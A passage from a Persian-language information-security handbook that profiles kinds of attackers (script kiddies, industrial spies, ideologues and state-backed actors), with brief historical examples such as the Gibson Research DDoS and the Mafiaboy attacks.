‫ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻧﺶ ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﻣﻤﻴﺰﻱ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻫﺴﺘﻪﻫﺎﻱ ﺍﺻﻠﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺩﻳﮕـﺮ ‪ -‬ﺍﺯ ﺟﻤﻠـﻪ ‪ - Linux‬ﺑـﻪ ﺍﻳـﻦ‬
‫ﺷﺪﺕ ﺑﺎﺯﺑﻴﻨﻲ ﻧﻤﻲﺷﻮﻧﺪ ﻭ ﺣﺎﻭﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺍﺯ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻫﺴﺘﻨﺪ‪ .‬ﻣﺸﻜﻞ ﻣﻲﺗـﻮﺍﻥ ﺩﺭﺟـﻪ ﺑـﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ ‪ Unix‬ﺍﺯ ﻗﺒﻴﻞ ‪ Solaris‬ﺭﺍ ﺩﺍﻧﺴﺖ‪.‬‬

‫ﺷﻨﺎﺧﺘﻦ ﻣﻬﺎﺟﻢ‬
‫ﭼﻪ ﻛﺴﻲ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻳﻚ ﺷﺒﻜﻪ ﺑﺎ ﺧﺒﺮﻩﺗﺮﻳﻦ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﻧﻔﻮﺫ ﻣﻲﻛﻨﺪ؟ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺗﻘﺮﻳﺒـﹰﺎ ﺍﻫﻤﻴﺘـﻲ ﻧـﺪﺍﺭﺩ؛ ﻳﻌﻨـﻲ ﻣﻬـﻢ ﻧﻴـﺴﺖ‬
‫ﻣﻬﺎﺟﻤﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﭼﻪ ﻛﺴﺎﻧﻲ ﺑﺎﺷﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﻤﺔ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﻣﺤﺎﻓﻈﺖ ﻛﺮﺩ‪.‬‬

‫‪Script Kiddie‬ﻫﺎ‬
‫ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﺍﺯ ﻧﺎﻡ ﺁﻧﻬﺎ ﭘﻴﺪﺍﺳﺖ‪ ،‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﻣﻬﺎﺟﻤﻴﻦ ﻛﻮﺩﻛﺎﻥ ﻭ ﻧﻮﺟﻮﺍﻧﺎﻥ ﻫﺴﺘﻨﺪ؛ ﻛـﺴﺎﻧﻲ ﻛـﻪ ﻣﺘﺄﺳـﻔﺎﻧﻪ ﻫﻨـﻮﺯ ﺑـﻪ ﺣـﺲ‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﻭ ﺗﺸﺨﻴﺺ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻣﻬﺎﺭﺗﻬﺎﻱ ﺗﻜﻨﻴﻜﻲ ﺧﻮﺩ ﻧﺮﺳﻴﺪﻩﺍﻧﺪ‪.‬‬
‫ﺑﻪ ﺟﻮﺍﻧﺎﻧﻲ ﻛﻪ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﺒﺮﺓ ﺗﻬﺎﺟﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ‪) Script Kiddie‬ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ( ﻣﻲﮔﻮﻳﻨﺪ‪ .‬ﺍﻳـﻦ ﻋﺒـﺎﺭﺕ ﺗﻤـﺴﺨﺮﺁﻣﻴﺰ‬
‫ﺍﺳﺖ‪ .‬ﻭﺍﮊﺓ "ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ" ﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ ﻛﻪ ﺍﻳﻦ ﻣﻬﺎﺟﻤﻴﻦ ﺑﺠﺎﻱ ﺍﻳﻨﻜﻪ ﺣﻤـﻼﺕ ﺧـﻮﺩ ﺭﺍ ﭘﺪﻳـﺪ ﺁﻭﺭﻧـﺪ ﺍﺯ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﺗﻬﺎﺟﻤﻲ ﺁﻣﺎﺩﻩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ‪ download‬ﺷﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻣﻬﺎﺟﻤﻴﻦ ﺍﺯ ﺁﻥ ﺟﻬﺖ "ﻓﺴﻘﻠﻲ" ﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﻧﺪ ﻛـﻪ‬
‫ﺳﻦ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﻫﻨﮕﺎﻡ ﺩﺳﺘﮕﻴﺮﻱ ﺯﻳﺮ ﺳﻦ ﻗﺎﻧﻮﻧﻲ ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺗﻬﺪﻳﺪ ﻭ ﺧﻄﺮ ﺟﺪﻱ ﺑﻪ ﺣﺴﺎﺏ ﺁﻳﻨﺪ‪ ،‬ﺑﻪ ﻫﻤﺎﻥ ﺩﻟﻴـﻞ ﻛـﻪ ﺍﺯ ﻧﻮﺟـﻮﺍﻧﻲ ﻛـﻪ ﺍﺳـﻠﺤﻪ ﺩﺍﺭﺩ ﺑﺎﻳـﺪ‬
‫ﺗﺮﺳﻴﺪ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺍﺯ ﻧﻮﺟﻮﺍﻧﺎﻧﻲ ﻛﻪ ﺍﺳﻠﺤﺔ ﺳﺒﻚ ﺣﻤﻞ ﻣﻲﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺣﺘﻲ ﺑﻴﺶ ﺍﺯ ﺑﺰﺭﮔﺴﺎﻻﻥ ﺗﺮﺳﻴﺪ‪ ،‬ﭼﺮﺍ ﻛـﻪ ﻳـﻚ ﻧﻮﺟـﻮﺍﻥ‬
‫ﻭﻗﺘﻲ ﻣﻲﺧﻮﺍﻫﺪ ﻣﺎﺷﻪ ﺭﺍ ﺑﻜﺸﺪ ﻛﻤﺘﺮ ﺍﺣﺘﻤﺎﻝ ﺩﺍﺭﺩ ﭘﻴﺎﻣﺪﻫﺎﻱ ﻋﻤﻞ ﺧﻮﺩ ﺭﺍ ﺑﻔﻬﻤﺪ ﻭ ﻟﺬﺍ ﺍﺣﺘﻤﺎﻝ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺭﺩ ﻛﻪ ﻣﺎﺷﻪ ﺭﺍ ﺑﻜﺸﺪ‪.‬‬
‫ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻫﻢ ﺻﺪﻕ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺆﺳﺴﻪ ﺗﺤﻘﻴﻘﺎﺗﻲ ﮔﻴﺒﺴﻮﻥ‪ ٣٦‬ﻫﺪﻑ‬
‫ﻳﻚ ﺗﻬﺎﺟﻢ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺧﺮﺍﺑﻲ ﺳﺮﻭﻳﺲ )‪ ٣٧(DDoS‬ﻗﺮﺍﺭ ﮔﺮﻓﺖ ﻛﻪ ﺁﻧﺮﺍ ﺑﻴﺶ ﺍﺯ ‪ ۱۷‬ﺳﺎﻋﺖ ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺖ‪ .‬ﺗﻬﺎﺟﻢ ﺍﺯ ﻃﺮﻳﻖ ﺑـﻴﺶ ﺍﺯ ‪۴۰۰‬‬
‫ﺭﺍﻳﺎﻧﻪ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows‬ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﺍﺟﺮﺍ ﺭﺳﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠﺔ ﺧﻮﺩﻛﺎﺭ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﻮﺩﻧﺪ‪ .‬ﻭﻗﺘـﻲ‬
‫ﻣﺴﺌﻠﻪ ﺭﻭﺷﻦ ﺷﺪ‪ ،‬ﺍﺳﺘﻴﻮ ﮔﻴﺒﺴﻮﻥ‪ ٣٨‬ﺗﻮﺍﻧﺴﺖ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﺣﻤﻠﻪ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪ ،‬ﻭ ﺳﭙﺲ ﺁﻧﺮﺍ ﻣﻬﻨﺪﺳﻲ ﻣﻌﻜﻮﺱ ﻭ ﺭﺩﻳﺎﺑﻲ ﻛﻨـﺪ‪.‬‬
‫ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﺸﺨﺺ ﺷﺪ ﻛﻪ ﻓﺮﺩ ﻣﻬﺎﺟﻢ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﻭ ﻳﻚ ﺩﺧﺘﺮ ‪ ۱۳‬ﺳﺎﻟﻪ ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺩﺭ ﻣﻮﺭﺩ ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮﻱ ﻭﻗﺘﻲ ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ ﻛﺎﻧﺎﺩﺍ ﺩﺭ ﻧﻮﺯﺩﻫﻢ ﺁﻭﺭﻳﻞ ﺳﺎﻝ ‪ "Mafiaboy" ۲۰۰۰‬ﺭﺍ ﺑﻪ ﺧﺎﻃﺮ ﺣﻤﻼﺕ ﻣﺎﻩ ﻓﻮﺭﻳﻪ ﺳـﺎﻝ‬
‫‪ ۲۰۰۰‬ﺍﻭ ﺑﻪ ‪ ،CNN ،E*TRADE ،Yahoo‬ﻭ ﺑﺴﻴﺎﺭﻱ ﺩﻳﮕﺮ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﭘﺮ ﺍﺯ ﭘﺮﻭﺭﻧﺪﻩﻫﺎﻱ ﺷﺨﺼﻲ ﻛﻪ ﻣﻮﺟﺐ ‪ ۱/۷‬ﻣﻴﻠﻴـﺎﺭﺩ ﺩﻻﺭ‬
‫ﺧﺴﺎﺭﺕ ﺷﺪﻩ ﺑﻮﺩ ﺑﺎﺯﺩﺍﺷﺖ ﻛﺮﺩﻧﺪ‪ ،‬ﻧﺘﻮﺍﻧﺴﺘﻨﺪ ﻧﺎﻡ ﻣﺘﻬﻢ ﺭﺍ ﺑﺮﺍﻱ ﻣﺮﺩﻡ ﻣﻨﺘﺸﺮ ﻛﻨﻨﺪ؛ ﭼﺮﺍ ﻛﻪ ﭘـﺴﺮﺑﭽﺔ ‪ ۱۶‬ﺳـﺎﻟﻪ‪ ،‬ﺗﺤـﺖ ﺣﻤﺎﻳـﺖ ﻗـﺎﻧﻮﻥ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻧﺪﮔﻲ ﺷﺨﺼﻲ ﺧﺮﺩﺳﺎﻻﻥ ﻛﺎﻧﺎﺩﺍ ﻗﺮﺍﺭ ﺩﺍﺷﺖ‪.‬‬
‫ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺭﺕ ﻓﻨﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﻧﻮﺷﺘﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻭ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍﻱ ﻣﺨﺼﻮﺹ ﺧـﻮﺩ ﺭﺍ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪،‬‬
‫ﻭﻟﻲ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻳﺸﺎﻥ ﻣﺸﻜﻞ ﺯﻳﺎﺩﻱ ﺍﻳﺠﺎﺩ ﻧﻤﻲﻛﻨﺪ‪ .‬ﺁﻧﻬﺎ ﺍﺑﺰﺍﺭ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻧﺪ ﻭ ﻣﺎﻳﻠﻨﺪ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؛ ﻳﺎ ﻧﻤﻲﻓﻬﻤﻨـﺪ‬
‫ﻣﻮﺟﺐ ﭼﻪ ﺧﺴﺎﺭﺍﺗﻲ ﻣﻲﺷﻮﻧﺪ ﻭ ﻳﺎ ﺑﺮﺍﻳﺸﺎﻥ ﺍﻫﻤﻴﺘﻲ ﻧﺪﺍﺭﺩ‪.‬‬

‫‪35‬‬ ‫‪Kernel‬‬
‫‪36‬‬ ‫‪Gibson Research Corporation‬‬
‫‪37‬‬ ‫‪Distributed Denial of Service Attack‬‬
‫‪38‬‬ ‫‪Steve Gibson‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٦٨‬‬

‫ﻳﻚ ﻓﺴﻘﻠﻲ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻭﻗﺘﻲ ﺑﺰﺭﮒ ﺷﺪ ﭼﻜﺎﺭﻩ ﺧﻮﺍﻫﺪ ﺷﺪ؟ ﻫـﻴﭽﻜﺲ ﻫﻨـﻮﺯ ﻣﻄﻤـﺌﻦ ﻧﻴـﺴﺖ؛ ﻫـﻴﭻ ﺑﺮﺭﺳـﻲ ﻣـﻮﺛﻘﻲ ﻭﺟـﻮﺩ ﻧـﺪﺍﺭﺩ‪.‬‬
‫ﮔﺰﺍﺭﺷﻬﺎﻱ ﻏﻴﺮ ﺭﺳﻤﻲ ﻣﻲﮔﻮﻳﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺭﺍﻩ ﺭﺍﺳﺖ ﻫﺪﺍﻳﺖ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻋﻼﻗﻪ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺍﺯ‬
‫ﺩﺳﺖ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺑﻌﻀﻲ ﻣﺘﺼﺪﻱ ﺳﻴﺴﺘﻢ ﻳﺎ ﺭﺍﻫﺒﺮ ﺷﺒﻜﻪ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﺣﺘﻲ ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺑﺎﺯﻣﻲﮔﺮﺩﻧﺪ )ﺍﺳﺘﺨﺪﺍﻡ ﭼﻨﻴﻦ‬
‫ﺍﻓﺮﺍﺩﻱ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﺷﺒﻜﻪ‪ ،‬ﺩﺭ ﻣﺠﺎﻣﻊ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﻨﻮﺯ ﻣﻮﺿﻮﻋﻲ ﻣﻮﺭﺩ ﻣﻨﺎﻗﺸﻪ ﺍﺳـﺖ(‪ ،‬ﻭﻟﻲ ﻧﺎﮔﻔﺘﻪ ﭘﻴﺪﺍﺳﺖ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑـﻪ ﺯﻧـﺪﮔﻲ‬
‫ﺗﺒﻬﻜﺎﺭﺍﻧﺔ ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﻣﻲﺩﻫﻨﺪ‪.‬‬

‫ﺟﺎﺳﻮﺳﻬﺎﻱ ﺻﻨﻌﺘﻲ‬
‫ﺑﻪ ﻧﻈﺮ ﻣﻲﺭﺳﺪ ﻛﻪ ﺑﺎﺯﺍﺭ ﺳﻴﺎﻩ ﺩﺭﺣﺎﻝ ﺭﺷﺪﻱ ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺳﺮﻗﺖﺷﺪﻩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﻛﻮﺷﺶ ﻛﺮﺩﻩ‪-‬‬
‫ﻼ ﭘﻴﺸﻨﻬﺎﺩ ﺭﻓﻊ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﻳـﻚ ﺷـﺮﻛﺖ ﺩﺭ ﻗﺒـﺎﻝ ﺩﺭﻳﺎﻓـﺖ ﻣﺒـﺎﻟﻎ‬ ‫ﺍﻧﺪ ﺍﺯ ﺻﺎﺣﺒﺎﻥ ﻗﺎﻧﻮﻧﻲ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺟﮕﻴﺮﻱ ﻭ ﺍﺧﺎﺫﻱ ﻛﻨﻨﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻫﻨﮕﻔﺖ ﺭﺍ ﺩﺍﺩﻩﺍﻧﺪ‪ .‬ﭼﻨﺪﻳﻦ ﻣﻮﺭﺩ ﻣﺴﺘﻨﺪ )ﻭ ﺍﺣﺘﻤﺎ ﹰﻻ ﻣﻮﺍﺭﺩ ﻣﺘﻌﺪﺩ ﮔﺰﺍﺭﺵ ﻧﺸﺪﻩ( ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺍﺳـﺖ ﻛـﻪ ﺩﺭ ﺁﻧﻬـﺎ ﻣﺠﺮﻣـﺎﻥ‪ ،‬ﺷـﻤﺎﺭﺓ ﻛﺎﺭﺗﻬـﺎﻱ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻳﻚ ﺷﺮﻛﺖ ﺩﺯﺩﻳﺪﻩ ﻭ ﺗﻬﺪﻳﺪ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻨﺘﺸﺮ ﺧﻮﺍﻫﻨﺪ ﻛـﺮﺩ ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ ﺷـﺮﻛﺖ‬
‫ﺑﻬﺎﻳﻲ ﺑﻪ ﺁﻧﻬﺎ ﺑﭙﺮﺩﺍﺯﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﮔﺰﺍﺭﺷﻬﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﻣﻬﺎﺟﻤﻴﻨﻲ ﺳﻌﻲ ﻛﺮﺩﻩﺍﻧﺪ ﺍﺳﺮﺍﺭ ﺻﻨﻌﺘﻲ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﻮﺭﺩ ﻧﻔﻮﺫ‬
‫ﻗﺮﺍﺭ ﺩﺍﺩﻩﺍﻧﺪ ﺭﺍ ﺑﻪ ﺭﻗﺒﺎﻳﺸﺎﻥ ﺑﻔﺮﻭﺷﻨﺪ‪ .‬ﺍﻳﻦ ﻣﻌﺎﻣﻼﺕ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﻳﮕـﺮ ‪ -‬ﻭ ﺍﻟﺒﺘـﻪ ﻧـﻪ ﻫﻤـﻪ ﻛـﺸﻮﺭﻫﺎ ‪-‬‬
‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﻋﻼﻡ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬

‫ﺍﻳﺪﻩﭘﺮﺩﺍﺯﺍﻥ ﻭ ﻋﻮﺍﻣﻞ ﺣﻜﻮﻣﺘﻲ‬


‫ﻫﻤﻴﺸﻪ ﻭ ﺩﺭ ﻫﻤﺔ ﺟﻮﺍﻣﻊ ﺟﻤﻌﻴﺘﻲ ﺍﺯ "ﻣﺘﻔﻜﺮﺍﻥ ﻣﺨﺎﻟﻒ" ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺪﻻﻳﻞ ﻓﻜﺮﻱ ﻳﺎ ﺳﻴﺎﺳﻲ ﺑﻪ ﺳﺎﻳﺘﻬﺎ ﻧﻔﻮﺫ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻣﻌﻤـﻮ ﹰ‬
‫ﻻ ﻧﻴـﺖ‬
‫ﺍﻳﻦ ﺍﻓﺮﺍﺩ "ﺗﻐﻴﻴﺮ ﻇﺎﻫﺮ ﺻﻔﺤﺎﺕ ﻭﺏ" ﺑﺮﺍﻱ ﻧﻮﻋﻲ ﺍﻧﺘﺸﺎﺭ ﺑﻴﺎﻧﻴﻪ ﺍﺳﺖ‪ .‬ﮔﺎﻫﻲ ﻣﺨﺎﻟﻔﻴﻦ ﻳﻚ ﺑﻴﺎﻧﻴﻪ ﺳﻴﺎﺳﻲ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﮔـﺎﻫﻲ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﻳﻚ ﻣﺴﺌﻠﻪ ﻓﻜﺮﻱ ﺭﺍ ﺍﺑﺮﺍﺯ ﻛﻨﻨﺪ‪ ،‬ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺻﺮﻓﹰﺎ ﺁﺷﻮﺏﻃﻠﺒﺎﻧﻲ ﺑﺎﺷﻨﺪ ﻛﻪ ﻋﻠﻴﻪ ﺻﻨﻌﺖ ﻳﺎ ﺑﺎﺯﺍﺭ ﺟﻨﺠﺎﻝ ﺑﻪ ﺭﺍﻩ ﻣﻲﺍﻧﺪﺍﺯﻧﺪ‪.‬‬
‫ﺍﻳﻦ ﻭﻗﺎﻳﻊ ﮔﺎﻫﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻼﻑ ﻋﻼﻳﻖ ﻣﻠﻲ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺟﻨﺒﺶ ﭼﺮﻳﻜﻲ ﻇﺎﻫﺮ ﺳﺎﻳﺘﻬﺎﻱ ﻣﺘﻌﻠﻖ ﺑـﻪ‬
‫ﻳﻚ ﺩﺳﺘﻪ ﺍﺯ ﻣﺨﺎﻟﻔﺎﻥ ﺩﻭﻟﺘﻲ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪ .‬ﺩﺭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﺍﻓﺮﺍﺩﻱ ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺗﻼﺵ ﻣﻲﻛﻨﻨﺪ ﺑﺎ ﺣﻤﻠﻪ ﺑﻪ ﺳﺎﻳﺘﻬﺎ ﺩﺭ ﻳﻚ ﺣﻮﺯﺓ‬
‫ﺣﻜﻮﻣﺘﻲ‪ ،‬ﻫﺪﻓﻲ ﺭﺍ ﺩﺭ ﻳﻚ ﺣﻮﺯﻩ ﺩﻳﮕﺮ ﺑﺮﺁﻭﺭﺩﻩ ﻛﻨﻨﺪ؛ ﻣﺎﻧﻨﺪ ﺩﺭﮔﻴﺮﻳﻬﺎﻱ ﺍﺳﺮﺍﺋﻴﻞ ﻭ ﻓﻠﺴﻄﻴﻦ‪ ،‬ﺟﺪﺍﻝ ﻣﻴﺎﻥ ﻫﻨﺪ ﻭ ﭘﺎﻛﺴﺘﺎﻥ‪ ،‬ﻭ ﭘـﺲ ﺍﺯ ﺁﻥ‬
‫ﺑﻤﺒﺎﺭﺍﻥ ﺳﻔﺎﺭﺕ ﭼﻴﻦ ﺗﻮﺳﻂ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺗﻬﺎﺟﻤﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﻮﺩﺟﻮﺵ ﺑﺎﺷﻨﺪ‪ ،‬ﺑﻌﻀﻲ ﻫﻢ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺗﻮﺳﻂ ﺧﻮﺩ ﺣﻜﻮﻣﺘﻬﺎ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻭ ﺣﻤﺎﻳﺖ ﻣﺎﻟﻲ ﺷﻮﻧﺪ‪.‬‬
‫ﺍﻳﻦ ﻭﻗﺎﻳﻊ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﺭﺍ ﻧﻴﺰ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺩﺭ ﺧﻼﻝ ﻳﻚ ﻧﻔﻮﺫ ﺩﺭ ﭼـﻴﻦ‪ ،‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ‪ISP‬ﻫـﺎﻳﻲ ﻛـﻪ‬
‫ﺻﻔﺤﺎﺕ ﻭﺏ ﻫﻮﺍﺩﺍﺭﺍﻥ ‪ Falun Gong‬ﺭﺍ ﺩﺭ ﺍﻃﺮﺍﻑ ﺟﻬﺎﻥ ﻣﻴﺰﺑﺎﻧﻲ ﻣﻲﻛﺮﺩﻧﺪ ﻣﺘﻮﺟﻪ ﺷﺪﻧﺪ ﻛﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨﺪﮔﺎﻧـﺸﺎﻥ ﺗﺤـﺖ ﺗﻬـﺎﺟﻢ‬
‫ﺳﺎﻳﺘﻬﺎﻳﻲ ﺍﺯ ﺩﺍﺧﻞ ﭼﻴﻦ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺑﻪ ﺩﻟﻴﻞ ﻫﻤﺎﻫﻨﮕﻲ ﻭ ﺗﻌﺪﺩ ﺣﻤﻼﺕ‪ ،‬ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ ﻣﻌﺘﻘﺪﻧﺪ ﻛﻪ ﺍﻳﻦ ﺣﻤـﻼﺕ ﺑـﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺩﻭﻟـﺖ‬
‫ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬

‫ﺟﺮﻡ ﺳﺎﺯﻣﺎﻥﻳﺎﻓﺘﻪ‬
